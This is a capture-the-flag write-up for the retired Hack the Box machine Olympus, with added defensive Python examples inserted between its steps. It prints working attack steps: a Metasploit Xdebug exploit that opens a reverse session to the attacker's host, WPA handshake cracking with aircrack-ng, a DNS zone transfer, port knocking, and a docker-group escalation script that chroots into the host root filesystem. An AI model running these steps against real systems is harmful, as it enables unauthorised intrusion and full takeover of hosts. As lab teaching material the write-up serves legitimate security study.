Hack the Box Writeup - Olympus
This post details the epic journey undertaken to meet with the ancient greek gods, represented here by the retired Hack the Box machine, Olympus.
Enumeration
As pretty much always, we begin with our initial enumeration using nmap.
$ nmap -sC -sV -p- -oA nmap/scan 10.10.10.83
Some interesting results here; a filtered ssh port, DNS Bind running on tcp port 53, http running, and yet another ssh service running on 2222 with an interesting fingerprint string.
Let's start with the HTTP service. Browsing to the site presents us with an image of Zeus and not much else, so let's take a closer look at what is going on using Burp.
Exploit
Looking at the response in Burp we find an interesting and uncommon header, xdebug. A quick Google search shows that this is a PHP extension to assist with debugging and development, i.e. something which should never go into production, and that versions 2.5.5 and below have a remote command execution exploit available. If your Metasploit is up to date then the exploit is ready to go.
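The header that gave this box away is exactly the kind of thing a response review should catch before a server goes live. The following is an added example, not code from the original post: it parses a raw HTTP response, lists any header that looks like a debugging aid, and checks whether an advertised Xdebug version falls in the 2.5.5-and-below range the post describes. Both sample responses are constructed; the header names other than Xdebug's own are assumptions about what is worth flagging.

```python
import re

# Constructed sample responses (not captured from the machine): one carrying the
# debugging header the post describes, one without it.
RESPONSE_WITH_XDEBUG = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.25 (Debian)\r\n"
    "Xdebug: 2.5.5\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body><img src=\"zeus.jpg\"></body></html>"
)
RESPONSE_CLEAN = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.25 (Debian)\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body><img src=\"zeus.jpg\"></body></html>"
)

# Header names that indicate a debugging aid is exposed. Xdebug's own header is
# on the page; the x-debug / x-php-debug patterns are assumed extras worth flagging.
DEBUG_HEADER_RE = re.compile(r"^(xdebug|x-debug.*|x-php-debug.*)$", re.I)

# Highest Xdebug version the post describes as having a public RCE exploit.
MAX_VULNERABLE_XDEBUG = (2, 5, 5)


def parse_headers(raw_response):
    """Split a raw HTTP response into a {lower-case name: value} dict."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:      # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def find_debug_headers(raw_response):
    """Return [(name, value)] for every header that looks like a debug aid."""
    return [(n, v) for n, v in parse_headers(raw_response).items()
            if DEBUG_HEADER_RE.match(n)]


def parse_version(text):
    """'2.5.5' -> (2, 5, 5); a trailing non-numeric suffix such as 'rc1' is ignored."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def xdebug_at_risk(raw_response):
    """True when an Xdebug header is present and its version is 2.5.5 or lower."""
    for name, value in find_debug_headers(raw_response):
        if name == "xdebug":
            return parse_version(value) <= MAX_VULNERABLE_XDEBUG
    return False


if __name__ == "__main__":
    for label, resp in (("with xdebug", RESPONSE_WITH_XDEBUG), ("clean", RESPONSE_CLEAN)):
        print(label, find_debug_headers(resp), "at risk:", xdebug_at_risk(resp))
```

Feeding real responses in is a matter of reading them from a proxy log or a `curl -i` capture; the useful part is that the check is a plain header-name match and a version comparison, so it can sit in a build or deployment gate with no network access.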
> use exploit/unix/http/xdebug_unauth_exec
> set rhost 10.10.10.83
> set lhost 10.10.14.15
> set lport 4444
> exploit
More Enumeration
And that gives us a meterpreter session, however the shell is very basic and is lacking a lot of commands such as python, so we can't really improve it. Fortunately, something stands out fairly quickly in our enumeration. There is a tool called airgeddon sitting in the home folder, and there already seems to be a nice packet capture in the captured directory.
Along with the packet capture is a text file which states "Captured while flying. I'll banish him to Olympia - Zeus". Referring back to our nmap scan, could this Olympia be referring to the second ssh service with the interesting fingerprint string?
Closing the shell and returning to the meterpreter session we can download the packet capture to our machine using the following command:
> download /home/zeus/airgeddon/captured/captured.cap
Cracking
Now we can open it in Wireshark, and looking at the packets it is fairly obvious that it is all wireless 802.11 traffic. So let's see what we can see.
The first thing that we make note of is the SSID of the wireless network being broadcast, Too_cl0se_to_th3_Sun.
Next, setting the display filter to eapol and scrolling through the results shows us that we have a full 4-way handshake towards the end of the file, meaning we can use aircrack-ng to attempt to brute-force the pre-shared key.
Make a note of the MAC address of the access point (the BSS ID), and then run the following:
$ aircrack-ng -w /usr/share/wordlists/rockyou.txt -b f4:ec:38:ab:a8:a9 captured.cap
This may take some time, so go and make yourself some nectar of the gods, or whatever else you fancy drinking.
After a while we get a result. The pre-shared key passphrase is flightoficarus.
So let's make some educated guesses here: given the wireless passphrase of flightoficarus, could our ssh username be icarus, and could the SSID be the password?
It is! That took me an embarrassingly long time to link in my head.
Further Enumeration
In the home directory of this new user is a single text file, called help_of_the_gods.txt. It contains the message:
Athena goddess will guide you through the dark...
Way to Rhodes...
ctfolympus.htb
That last line looks suspiciously like a domain name. Maybe we can use that with the DNS service on TCP port 53. So bring up another terminal on your host machine and let's see if we can get a zone transfer.
$ dig axfr @10.10.10.83 ctfolympus.htb
; <<>> DiG 9.11.3-1-Debian <<>> axfr @10.10.10.83 ctfolympus.htb
; (1 server found)
;; global options: +cmd
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb. 86400 IN A 192.168.0.120
ctfolympus.htb. 86400 IN NS ns1.ctfolympus.htb.
ctfolympus.htb. 86400 IN NS ns2.ctfolympus.htb.
ctfolympus.htb. 86400 IN MX 10 mail.ctfolympus.htb.
crete.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
mail.ctfolympus.htb. 86400 IN A 192.168.0.120
ns1.ctfolympus.htb. 86400 IN A 192.168.0.120
ns2.ctfolympus.htb. 86400 IN A 192.168.0.120
rhodes.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
www.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 24 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Thu May 10 10:39:36 EDT 2018
;; XFR size: 15 records (messages 1, bytes 475)
Take a close look at the TXT entry near the top of the results. That clue leads me to think that the currently filtered ssh service on port 22 could be opened temporarily, and the numbers given suggest to me that the way to open it is a technique called port knocking.
Knock, Knock
We can test our theory with a single-line bash script.
$ for x in 3456 8234 62431; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.83; done
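To make clear what the knock daemon on the other side of that loop is doing, here is an added example (not code from the original post or from any knock daemon) of the server-side logic: a per-source state machine that walks connection attempts through the 3456, 8234, 62431 sequence from the TXT record, expires stale partial sequences, and reports which sources completed it. The log lines are constructed in an iptables-like layout, and the 10-second window is an assumption; a defender can run the same replay over real firewall logs to see who has been opening the port.

```python
import re

# Knock sequence from the zone's TXT record on the page; the window is an assumption.
KNOCK_SEQUENCE = (3456, 8234, 62431)
KNOCK_WINDOW_SECONDS = 10.0

# Constructed firewall log lines (not real logs) in an iptables/netfilter-like layout:
# "<epoch> IN=<iface> SRC=<ip> DST=<ip> PROTO=TCP DPT=<port>"
# 10.10.14.15 completes the sequence; 10.10.14.99 hits port 22 mid-way and never does.
SAMPLE_LOG = """\
1525963176 IN=eth0 SRC=10.10.14.15 DST=10.10.10.83 PROTO=TCP DPT=3456
1525963177 IN=eth0 SRC=10.10.14.15 DST=10.10.10.83 PROTO=TCP DPT=8234
1525963178 IN=eth0 SRC=10.10.14.15 DST=10.10.10.83 PROTO=TCP DPT=62431
1525963180 IN=eth0 SRC=10.10.14.99 DST=10.10.10.83 PROTO=TCP DPT=3456
1525963181 IN=eth0 SRC=10.10.14.99 DST=10.10.10.83 PROTO=TCP DPT=22
1525963182 IN=eth0 SRC=10.10.14.99 DST=10.10.10.83 PROTO=TCP DPT=8234
1525963183 IN=eth0 SRC=10.10.14.99 DST=10.10.10.83 PROTO=TCP DPT=62431
"""

LOG_RE = re.compile(r"^(?P<ts>\d+)\s.*\bSRC=(?P<src>[\d.]+)\s.*\bDPT=(?P<dpt>\d+)")


class KnockTracker:
    """Server-side view of port knocking: per source, track progress through the sequence."""

    def __init__(self, sequence=KNOCK_SEQUENCE, window=KNOCK_WINDOW_SECONDS):
        self.sequence = tuple(sequence)
        self.window = window
        self.progress = {}   # src -> (index of next expected knock, time of first knock)
        self.opened = set()  # sources that completed the whole sequence

    def observe(self, src, port, ts):
        """Feed one connection attempt; return True when the sequence completes."""
        idx, start = self.progress.get(src, (0, ts))
        if idx and ts - start > self.window:
            idx, start = 0, ts                # partial sequence is too old: forget it
        if port == self.sequence[idx]:
            if idx == 0:
                start = ts                    # first knock starts the clock
            idx += 1
        elif port == self.sequence[0]:
            idx, start = 1, ts                # wrong port, but it restarts the sequence
        else:
            idx = 0                           # wrong port: back to square one
        if idx == len(self.sequence):
            self.opened.add(src)
            self.progress.pop(src, None)
            return True
        if idx:
            self.progress[src] = (idx, start)
        else:
            self.progress.pop(src, None)
        return False


def replay_log(log_text, sequence=KNOCK_SEQUENCE, window=KNOCK_WINDOW_SECONDS):
    """Run the tracker over log lines; return the set of sources that completed the knock."""
    tracker = KnockTracker(sequence, window)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            tracker.observe(m["src"], int(m["dpt"]), float(m["ts"]))
    return tracker.opened


if __name__ == "__main__":
    print("sources that completed the knock:", sorted(replay_log(SAMPLE_LOG)))
```

The reset-on-wrong-port rule is what makes a full port scan fail to open the door by accident: a scanner that walks ports in numeric order hits plenty of other ports between 3456 and 8234, each of which sends it back to the start.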
$ ssh prometheus@10.10.10.83
Then using the username prometheus and the password of St34l_th3_F1re!, we are in. We have gained access to Hades, and access to the first flag! Our epic journey is almost at an end.
Yet More Enumeration
Enumerating this machine, we can see that our current user is a member of the docker group (which explains all those other limited shells we were stuck in: they were all Docker containers), and checking the running services we can see that Docker is installed and running. Some more googling of privilege escalation vectors soon leads me to the following article, privilege escalation via docker.
The page links through to a GitHub repository, so we download and modify the Dockerfile and the script it uses; this is necessary because this machine has no internet access and cannot pull the images directly.
Root Exploit
So we create a directory for our docker image, and then create a Dockerfile:
#
# Dockerfile
#
FROM ubuntu:14.04
COPY exploit.sh /exploit.sh
CMD ["/bin/bash", "exploit.sh"]
Note the FROM line in there. We need to change it as we are unable to download this image. A quick docker images command shows us what is already installed, so we can modify the Dockerfile to the following:
#
# Dockerfile
#
FROM olympia
COPY exploit.sh /exploit.sh
CMD ["/bin/bash", "exploit.sh"]
Then we create the exploit.sh containing the following:
#!/bin/bash
#
# exploit.sh
#
# Expects the host root filesystem to be bind-mounted at /hostOS.
if [ ! -d "/hostOS" ]; then
echo
echo ==== ERROR ====
echo It looks like /hostOS does not exist
echo Please run this docker image with a /hostOS volume mounted to /
echo For example: docker run -v /:/hostOS -i -t exploitapp
echo
exit 1
fi
# Sanity check that what is mounted really is a root filesystem.
if [ ! -e "/hostOS/bin/sh" ]; then
echo
echo ==== ERROR ====
echo It looks like /hostOS does not contain a root filesystem
echo Please run this docker image with a /hostOS volume mounted to /
echo For example: docker run -v /:/hostOS -i -t exploitapp
echo
exit 1
fi
echo
echo You should now have a root shell on the host OS
echo Press Ctrl-D to exit the docker instance / shell
# Change root into the host filesystem; the container runs as root, so this shell is host root.
chroot /hostOS /bin/sh
Now tie it all up in a bow:
$ docker build -t rootplease .
$ docker run -v /:/hostOS -i -t rootplease
And there we go, root and access to the final flag. Our epic journey to mount Olympus is complete.
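The whole escalation rests on two conditions a host audit can check: an ordinary user in the docker group, and a container that bind-mounts the host's root filesystem. The following is an added example, not code from the post or from the linked repository, that pulls both out of the kind of data an administrator already has to hand: an /etc/group file and `docker inspect` output. Both inputs are constructed here; the group name and the prometheus member come from the post, while the numeric gid, the second container and the list of sensitive host paths beyond "/" are assumptions.

```python
import json

# Constructed /etc/group excerpt (gid is an assumption; the member is from the post).
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:
docker:x:999:prometheus
"""

# Constructed `docker inspect` output for two containers (not taken from the machine):
# one with the host root filesystem bind-mounted as in the post, one with a named volume.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/rootplease",
        "HostConfig": {"Privileged": False, "Binds": ["/:/hostOS"]},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/hostOS", "RW": True}],
    },
    {
        "Name": "/olympia",
        "HostConfig": {"Privileged": False, "Binds": []},
        "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/data/_data",
                    "Destination": "/data", "RW": True}],
    },
])

# Host paths which, bind-mounted into a root-running container, amount to host root.
# "/" is the case on the page; the others are assumed additions.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock")


def docker_group_members(group_text):
    """Return the members listed for the docker group in /etc/group text."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [m for m in fields[3].split(",") if m]
    return []


def is_sensitive_host_path(path):
    """True for "/" itself or anything at or below one of the other sensitive paths."""
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/")
               for p in SENSITIVE_HOST_PATHS if p != "/")


def risky_mounts(inspect_json):
    """Return (container, source, destination) for bind mounts of sensitive host paths."""
    findings = []
    for container in json.loads(inspect_json):
        for mount in container.get("Mounts", []):
            if mount.get("Type") != "bind":
                continue
            src = mount.get("Source", "")
            if is_sensitive_host_path(src):
                findings.append((container["Name"], src, mount.get("Destination")))
    return findings


def privileged_containers(inspect_json):
    """Return names of containers started with --privileged (the other classic route)."""
    return [c["Name"] for c in json.loads(inspect_json)
            if c.get("HostConfig", {}).get("Privileged")]


def audit(group_text, inspect_json):
    """Combine the checks into one report dict."""
    return {
        "docker_group_members": docker_group_members(group_text),
        "risky_mounts": risky_mounts(inspect_json),
        "privileged_containers": privileged_containers(inspect_json),
    }


if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_GROUP_FILE, SAMPLE_INSPECT), indent=2))
```

On a live host the two inputs are `cat /etc/group` and `docker inspect $(docker ps -aq)`; the point of the report is that any non-empty docker_group_members list is equivalent to a list of users with root, which is the lesson of this box.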